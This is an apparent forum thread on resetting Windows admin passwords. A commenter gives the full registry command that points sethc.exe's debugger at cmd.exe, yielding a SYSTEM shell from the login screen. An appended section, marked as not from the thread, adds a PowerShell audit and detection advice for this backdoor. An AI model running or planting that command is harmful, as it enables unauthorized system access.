by nebster 1113 days ago
Do you mean the key for XP? If so, you can recover it using a command or through the registry.

You can use rainbow tables to crack passwords for XP, which was super quick, though!


Ah it was the password for the admin account and not the key!
AFAIK you could just set a new admin password using a live CD and some tool.

I wonder if that’s still possible.

Not only is it still possible, there's even a supported first-party tool to do so:

https://learn.microsoft.com/en-us/microsoft-desktop-optimiza...

This only works for local accounts, though similarly trivial techniques apply to Active Directory accounts if you have "live CD" access to a domain controller.

Just to be clear, in neither case is this a security vulnerability; under the "live CD" assumption — specifically, that you're able to make even a single arbitrary registry edit — there are far simpler ways to completely bypass Windows security that require neither tools nor understanding of the (AFAIK undocumented) HKEY_LOCAL_MACHINE\SAM registry hive.

For example, make the registry edit given by the

  reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
  Image File Execution Options\sethc.exe"
  /v Debugger /d C:\Windows\System32\cmd.exe /f
command (without line breaks).

Then, at any login, lock, or "Ctrl+Alt+Delete" screen, pressing the Shift key five times pops up a shell running as NT AUTHORITY\SYSTEM[1].

This has immediate effect — you don't even need to reboot or log out.

[1] https://learn.microsoft.com/en-us/windows/win32/services/loc...
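As an added example (not code from the thread or from Microsoft), here is the defender-side check for the Image File Execution Options edit described above: any subkey under IFEO that carries a `Debugger` value causes Windows to launch that debugger in place of the named executable, so auditing for such values is the direct way to spot the sethc.exe replacement or any similar one. The registry paths are the real IFEO keys (the `WOW6432Node` path is the 32-bit view present on 64-bit Windows); the function name `Get-IfeoDebugger` is this example's own, and it assumes it is run as an administrator on the live system.

```powershell
# Added example: enumerate IFEO subkeys whose "Debugger" value is set.
# Both the native and the WOW6432Node views are real key paths on 64-bit Windows.
$IfeoPaths = @(
    'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
)

function Get-IfeoDebugger {
    # Hypothetical helper name (this example's own). Returns one object per
    # IFEO subkey that has a Debugger value, or nothing if none are set.
    param([string[]]$Paths = $IfeoPaths)

    foreach ($root in $Paths) {
        Get-ChildItem -Path $root -ErrorAction SilentlyContinue | ForEach-Object {
            $dbg = (Get-ItemProperty -Path $_.PSPath -Name Debugger -ErrorAction SilentlyContinue).Debugger
            if ($dbg) {
                [pscustomobject]@{
                    Image    = $_.PSChildName   # e.g. sethc.exe
                    Debugger = $dbg             # what Windows will actually launch
                    Key      = $_.Name          # full registry key for follow-up
                }
            }
        }
    }
}

$findings = @(Get-IfeoDebugger)
if ($findings.Count -eq 0) {
    Write-Output 'No IFEO Debugger values set.'
} else {
    Write-Output "Found $($findings.Count) IFEO Debugger value(s); review each before removing:"
    $findings | Format-Table -AutoSize
}
```

A hit is not automatically malicious: developer tooling legitimately registers an IFEO debugger for its own binaries, so each finding should be judged by which image is redirected and to what. An entry that points an accessibility binary such as sethc.exe at cmd.exe has no legitimate explanation and can be cleared with `Remove-ItemProperty -Path <Key> -Name Debugger`. Because the edit takes effect immediately, as the comment notes, a one-off audit is not enough on its own; monitoring registry writes under that path (for instance Sysmon's registry value-set event, ID 13) catches the change at the moment it is made, and the offline "live CD" case is the reason disk encryption with a TPM-sealed key matters: it removes the ability to edit the hive without first authenticating.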